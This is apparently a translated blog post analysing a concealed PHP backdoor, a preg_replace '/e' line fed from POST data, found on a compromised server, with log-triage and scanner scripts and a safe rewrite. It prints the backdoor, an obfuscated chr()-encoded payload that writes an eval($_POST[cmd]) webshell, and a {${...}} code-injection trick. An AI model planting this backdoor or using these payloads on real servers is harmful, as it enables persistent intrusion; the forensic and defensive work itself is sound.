There are many kinds of PHP backdoors, and I have seen and played with plenty of them, but while helping a friend check his server I unexpectedly ran into the following malicious code.

The situation was this: my friend had scanned his site with all kinds of tools and could not find the PHP Trojan backdoor. He could never work out how the attacker was getting in. Every time he removed a backdoor, the attacker was able to come back in, and the entry point was never found. This was really painful.
 
Later, traces were finally found in the logs. My analysis showed one IP address repeatedly POSTing data to a single file in a very odd way. Some time after that, the same IP would request a baffling file whose conspicuous name was clearly not a normal system file: that was the PHP backdoor. But it was deleted soon after each use.
 
Haha, this attacker was quite careful.
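The log pattern described above (one client POSTing over and over to the same script, then requesting a file that is not part of the deployed site) is something a defender can triage mechanically rather than by eye. The script below is an added example and not code from the original post; the log lines, client addresses, paths and the allowlist of deployed files are all constructed, and it assumes Apache's combined log format.

```php
<?php
// Added example (not from the original post): triage of access-log lines for
// the pattern described in the text: one client repeatedly POSTing to a
// single script, then requesting a .php file that is not part of the site.
// All log lines below are constructed sample data in Apache "combined" format.

$sampleLog = <<<'LOG'
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /forum/include/common.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:13:55:40 +0000] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "POST /forum/include/common.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:09 +0000] "GET /forum/data/a.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:13:57:12 +0000] "GET /forum/viewthread.php?tid=4 HTTP/1.1" 200 8101 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:58:30 +0000] "POST /forum/data/a.php HTTP/1.1" 200 233 "-" "Mozilla/5.0"
LOG;

/**
 * Parse one combined-format line into ip / method / path / status, or null
 * if the line does not match the expected layout.
 */
function parseLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    // strtok() drops the query string so "?tid=4" does not create a new path
    return ['ip' => $m[1], 'method' => $m[2], 'path' => strtok($m[3], '?'), 'status' => (int) $m[4]];
}

/**
 * Report clients that have POSTed to some script and then request a .php
 * path that is not in the allowlist of deployed files ($knownFiles is a
 * constructed allowlist; in practice build it from the release manifest).
 */
function findSuspiciousClients(string $log, array $knownFiles): array
{
    $postsByIp = [];   // ip => [path => number of POSTs]
    $findings  = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $r = parseLine($line);
        if ($r === null) {
            continue;
        }
        if ($r['method'] === 'POST') {
            $postsByIp[$r['ip']][$r['path']] = ($postsByIp[$r['ip']][$r['path']] ?? 0) + 1;
        }
        $isPhp = str_ends_with($r['path'], '.php');
        if ($isPhp && !in_array($r['path'], $knownFiles, true) && isset($postsByIp[$r['ip']])) {
            $findings[] = sprintf(
                '%s requested unknown script %s after %d POST(s) to %s',
                $r['ip'],
                $r['path'],
                array_sum($postsByIp[$r['ip']]),
                implode(',', array_keys($postsByIp[$r['ip']]))
            );
        }
    }
    return array_values(array_unique($findings));
}

// Constructed allowlist of files that belong to the deployed application.
$known = ['/forum/index.php', '/forum/viewthread.php', '/forum/include/common.php'];
foreach (findSuspiciousClients($sampleLog, $known) as $finding) {
    echo $finding, PHP_EOL;
}
```

Run it with any PHP 8 interpreter; the only client it reports is 203.0.113.7, first when it fetches /forum/data/a.php after two POSTs to common.php, and again when it starts POSTing to a.php itself. The allowlist is what makes this work: the unusual file name the author noticed is exactly the kind of path that is absent from a release manifest.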
 
Analysis of the file that the attacker kept requesting turned up this code:
 
@preg_replace("//e", $_POST['IN_COMSENZ'], "Access Denied");
 
At first glance this line looks harmless, but it is the malicious code the attacker hid: the backdoor itself. It is well concealed and, as a rule, no anti-malware scanner will flag it.
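A scanner that matches only known webshell strings misses this line because nothing in it looks like a shell; what gives it away is the pattern literal carrying the "e" modifier, which is what makes preg_replace() run its replacement argument as code. The following static scanner is an added example, not code from the original post or from any scanning product; it uses PHP's own tokenizer, the source snippets it scans are constructed, and the file names are placeholders.

```php
<?php
// Added example (not from the original post): a small static scanner that
// flags every preg_replace() call whose pattern is a string literal carrying
// the "e" modifier, and every call whose pattern is built at runtime (which
// cannot be judged statically and needs a manual look). Sample sources below
// are constructed and the file names are placeholders.

/**
 * Return the modifier letters of a delimited PCRE literal such as "/.../ies",
 * or null if the string does not look like a delimited pattern at all.
 */
function patternModifiers(string $pattern): ?string
{
    $pattern = ltrim($pattern);
    if ($pattern === '') {
        return null;
    }
    $open = $pattern[0];
    if (ctype_alnum($open) || $open === '\\') {
        return null; // PCRE does not allow these as delimiters
    }
    $pairs = ['(' => ')', '[' => ']', '{' => '}', '<' => '>'];
    $close = $pairs[$open] ?? $open;
    $end   = strrpos($pattern, $close);   // last occurrence = closing delimiter
    if ($end === false || $end === 0) {
        return null;
    }
    return substr($pattern, $end + 1);
}

/**
 * Tokenize PHP source and report preg_replace() calls with an "e" modifier
 * in a literal pattern, or with a non-literal pattern.
 */
function scanForEvalModifier(string $source, string $file = 'input'): array
{
    $findings = [];
    $tokens   = token_get_all($source);
    $n        = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];
        // unqualified function names arrive as T_STRING; '@' before the call is a separate token
        if (!is_array($t) || $t[0] !== T_STRING || strcasecmp($t[1], 'preg_replace') !== 0) {
            continue;
        }
        $line = $t[2];
        // step over whitespace to "(", then to the first argument
        $j = $i + 1;
        while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $n || $tokens[$j] !== '(') {
            continue;
        }
        $j++;
        while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $n) {
            break;
        }
        $arg = $tokens[$j];
        if (is_array($arg) && $arg[0] === T_CONSTANT_ENCAPSED_STRING) {
            $literal = substr($arg[1], 1, -1);          // strip the surrounding quotes
            $mods    = patternModifiers($literal);
            if ($mods !== null && str_contains($mods, 'e')) {
                $findings[] = "$file:$line: preg_replace() with /e modifier: {$arg[1]}";
            }
        } else {
            $findings[] = "$file:$line: preg_replace() with non-literal pattern, review manually";
        }
    }
    return $findings;
}

// Constructed sample sources: the two calls discussed in the text, a benign
// call, and one whose pattern comes from a variable.
$samples = [
    'common.php' => '<?php @preg_replace("//e", $_POST[\'IN_COMSENZ\'], "Access Denied");',
    'bbcode.php' => '<?php echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", \'test("\1")\', $_GET["h"]);',
    'clean.php'  => '<?php echo preg_replace("/\s+/", " ", $text);',
    'dyn.php'    => '<?php echo preg_replace($pattern, $rep, $text);',
];
foreach ($samples as $file => $src) {
    foreach (scanForEvalModifier($src, $file) as $finding) {
        echo $finding, PHP_EOL;
    }
}
```

The scanner is deliberately narrow: it reports common.php and bbcode.php, stays silent on clean.php, and asks for a manual look at dyn.php. Pattern strings assembled at runtime, or calls reached through a variable function name, are outside what tokenizing alone can decide, so treat the non-literal finding as a review queue rather than noise. On PHP 7.0 and later the /e modifier is gone altogether (preg_replace() warns and returns NULL), so on a current interpreter the backdoor in this article simply stops working; on a PHP 5 host the scanner is the quickest way to enumerate every such call.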
 
The preg_replace function prototype:
 
mixed preg_replace (mixed $pattern, mixed $replacement, mixed $subject [, int $limit])
 
Description:
 
The /e modifier makes preg_replace() treat the replacement parameter as PHP code after the appropriate back-reference substitutions have been made. Tip: make sure the replacement string forms valid PHP code, otherwise PHP will report a syntax parse error on the line containing the preg_replace() call.
 
The code above takes its data from a POST request, which is slightly more work to test; if the data came in via GET...
 
Example:
 
echo preg_replace("/test/e", $_GET['h'], "just test");
 
If we submit ?h=phpinfo(), phpinfo() will be executed (with the /e modifier, preg_replace runs the replacement parameter as PHP code).
 
If we use POST instead, we test by submitting the following:
 
h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
 
The corresponding plaintext is:
 
fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>');
 
The result of executing it is that a one-line Trojan, a.php, is written into the /data/ directory.
 
This is scary...
 
A harder example:

The code is as follows:

<?php
function test($str) {}
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $_GET['h']);
?>

If we submit ?h=[php]phpinfo()[/php], will phpinfo() be executed?
 
It won't. After the regex match, the replacement parameter becomes 'test("phpinfo()")', where phpinfo() is merely a string argument passed to test().
 
Is there any way to get it executed?
 
Answer: of course. If we submit ?h=[php]{${phpinfo()}}[/php], phpinfo() will be executed. Why is that?
 
In PHP, if a double-quoted string contains variables, the interpreter replaces them with the variables' values; variables inside single quotes are not processed.
 
Note: a plain function call inside double quotes is not executed or substituted.
 
Here we use {${}} to construct a special variable, so the replacement becomes 'test("{${phpinfo()}}")' and the function gets executed (${phpinfo()} is interpreted and evaluated when the string is built).
 
You can verify this with the following test:
 
echo "{${phpinfo()}}"; phpinfo() will be executed successfully.
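The root cause in the harder example is not the [php] tag handling but the fact that the captured text is spliced into a string that is then parsed as PHP. The rewrite below is an added example, not the original post's code or the author's own fix: it keeps the same pattern and the same test() helper (whose body, left empty in the text, is assumed here to render the captured text as escaped HTML) but uses preg_replace_callback(), so the capture reaches test() as a plain string argument and the {${...}} interpolation trick has no string literal to act on.

```php
<?php
// Added example (not from the original post): the [php]...[/php] handler
// from the text rewritten without the /e modifier. preg_replace_callback()
// hands the captured groups to a PHP function as data, so nothing in the
// user-supplied input is ever parsed as code.

/** Render one captured block as escaped text (body assumed; the text leaves it empty). */
function test(string $str): string
{
    return '<pre>' . htmlspecialchars($str, ENT_QUOTES, 'UTF-8') . '</pre>';
}

/**
 * Safe equivalent of
 *   preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $h);
 * The pattern keeps the i and s modifiers; only e is dropped, and the
 * replacement is a callback instead of a code string.
 */
function renderPhpTags(string $h): string
{
    return preg_replace_callback(
        '/\s*\[php\](.+?)\[\/php\]\s*/is',
        static fn(array $m): string => test($m[1]),
        $h
    );
}

// Constructed inputs: the two probes discussed in the text. In both cases
// $m[1] is just the characters between the tags, and test() escapes them.
foreach (['[php]phpinfo()[/php]', '[php]{${phpinfo()}}[/php]'] as $probe) {
    echo renderPhpTags($probe), PHP_EOL;
}
```

Because the callback receives "{${phpinfo()}}" as the value of $m[1] rather than as source text inside a double-quoted literal, PHP never performs variable interpolation on it, and phpinfo() is never invoked. The same change applies to any /e call whose replacement is a fixed expression over back-references; there is no legitimate use of /e that preg_replace_callback() cannot express.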
 
So keep this in mind when you are hunting for backdoors.
 
OK, that's enough explanation; you should understand by now. Here is the code from above once more:
 
@preg_replace("//e", $_POST['IN_COMSENZ'], "Access Denied");
 
Code that looks perfectly normal is in fact extremely dangerous and deeply hidden. Haha. I hope this helps you.
 
Author: hefei manufacturing

